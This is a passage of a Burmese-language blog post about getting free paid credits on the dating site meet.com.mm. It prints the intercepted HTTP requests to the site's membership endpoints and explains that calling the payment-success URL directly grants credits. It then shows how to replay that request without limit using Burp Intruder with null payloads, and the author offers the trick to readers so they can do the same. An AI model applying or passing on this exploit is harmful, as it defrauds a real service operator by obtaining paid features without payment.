Hacking Credits in Meet

FA တစ္ေယာက္ျဖစ္ခဲ့ေတာ့ FA အခ်င္းခ်င္းကိုယ္ခ်င္းစာမိတယ္ေလ ခုေတာ့ RS ျဖစ္သြားပါျပီ။ Meet ကေနရွာတာေတာ့မဟုတ္ဘူး hehe ဒါေပမဲ့လို႕ တကယ္လို႕မ်ား ေစာ္ရွာခ်င္တဲ့ ညီအစ္ကိုေတြ အသံုးမ်ားတည့္မလားဆိုျပီး ေရးေပးလိုက္တယ္။

Privacy

ေဆာက္ရမ္းမိုက္တယ္ဗ်။ ဘာတာဝန္မွမရွိဘူး သူတို႕မွာ hee ။ ဖတ္ၾကည့္ၾကေပါ့ ။

http://meet.com.mm/pages/privacy

ဒါနဲ႕ က်ေနာ္လဲ Hi မယ္ေပါ့ ။ ေအာက္ကတစ္ေယာက္မဆိုးဘူးေပါ့ 😛

Wink ဆုိပါလား ဘာလဲေတာ့မသိဘူး ။ ပို႕မယ္ကြာ

5 Credits ဆိုပါလား

ကိုင္း FA ေတြကို ေစာ္ရွာေပးမလိုလိုနဲ႕ credits ကလာျပီ။ ရတယ္ေလ ပို႕ေပါ့။ ဒီေတာ့ Credits က စစလုပ္ခ်င္း 100 ပဲရတယ္။ ကိုယ္က Wink အေယာက္ ၂၀ ပို႕လို႕ ေစာ္ကရခ်င္မွရမွာေလ။ ခက္ေတာ့တာပဲ ။

ဒါနဲ႕ FA ေလးခမ်ာလိုက္ရွာရေတာ့တာေပါ့။ အလဲ့ သေဘာေကာင္းတယ္ဟ

အလကားရတာပဲ ဝယ္မယ္ကြာ ။ ဒီတိုင္းမဝယ္ဘူး Burp နဲ႕ဖမ္းျပီးဝယ္မယ္ အယ္လယ္ 😛

POST /Ajax/checkMemberShipPlan HTTP/1.1
Host: meet.com.mm
Content-Length: 9
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://meet.com.mm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://meet.com.mm/users/membership
Accept-Language: en-US,en;q=0.8
Cookie: CAKEPHP=ငါ့ကြတ္ကီး; __utmt=1; __utma=195022769.1906458842.1502211061.1502211061.1502211061.1; __utmb=195022769.5.10.1502211061; __utmc=195022769; __utmz=195022769.1502211061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.3.1906458842.1502211061; _gid=GA1.3.1798025409.1502211062; _gat=1
Connection: close

plan_id=1

သူက Checking လုပ္တယ္ဗ်။ သူ႕သေဘာက တစ္လေနမွေနာက္တစ္ခါရမွာကိုး ။လုပ္ေပါ့ ။ ခက္ေနေသးတာ ကတစ္ခုရွိေသးတယ္။ ခုဆို 200 credits ျဖစ္သြားေပမယ့္ အေယာက္ ၄၀ ပို႕လဲေစာ္ကရခ်င္မွရဦးမွာ ။ မေသခ်ာဘူးေလ ။ ခ်စ္ကံေခခဲ့တာကိုး 😛 စိတ္မပူပါနဲ႕ LOL Security လာပါျပီ။ Checking လုပ္ျပီးတဲ့အခါက်ေတာ့ ဒီတိုင္းမေနဘူး ေနာက္ထပ္ Request တစ္ခုထပ္ထြက္တယ္။

GET membership_plans/success/1 HTTP/1.1
Host: meet.com.mm
Connection: close
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://meet.com.mm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://meet.com.mm/users/membership
Accept-Language: en-US,en;q=0.8
Cookie: CAKEPHP=ငါ့ကြတ္ကီး

အလဲ့ ဒါကမွတကယ္ရတယ္ all FA fri တုိ႕ေရ 😛

ဒီေတာ့ကာ Cookie ကလဲရွိေနျပီးသားဆိုေတာ့

meet.com.mm/membership_plans/success/1

WOW ေပါ့ ။

ျပီးေတာ့ FA ေတြထဲမွာ အရမ္းတက္ၾကြတဲ့ FA ေတြ ပါသလို ကိုယ့္လို ေသာက္ပ်င္း FA ေတြလဲပါခ်င္ပါဦးမွာေလ။ သူတို႕ေတြ ေစာ္ေတြအမ်ားၾကီးကို ၾကိဳးပမ္းဖို႕ FA ေသာက္ပ်င္းေတြလဲ စိတ္ဝင္စားေအာင္ နည္းတစ္ခုေပးလိုက္မယ္။

Burpsuite ထဲကေန အဲဒီ Request ကို Intruder ထဲပို႕လိုက္တယ္။ Null Payload ေလးနဲ႕ ကိုယ္ၾကိုက္သေလာက္ Request ေတြကို လႊတ္ထည့္လိုက္ေတာ့ FA ေသာက္ပ်င္းတို႕ေရ 😛

ကဲ ခုဆိုရင္ ဖြန္ေၾကာင္ဖို႕ တစ္ဖက္တစ္လွမ္းကေန ကူညီလိုက္ပါျပီ။

Thanks for reading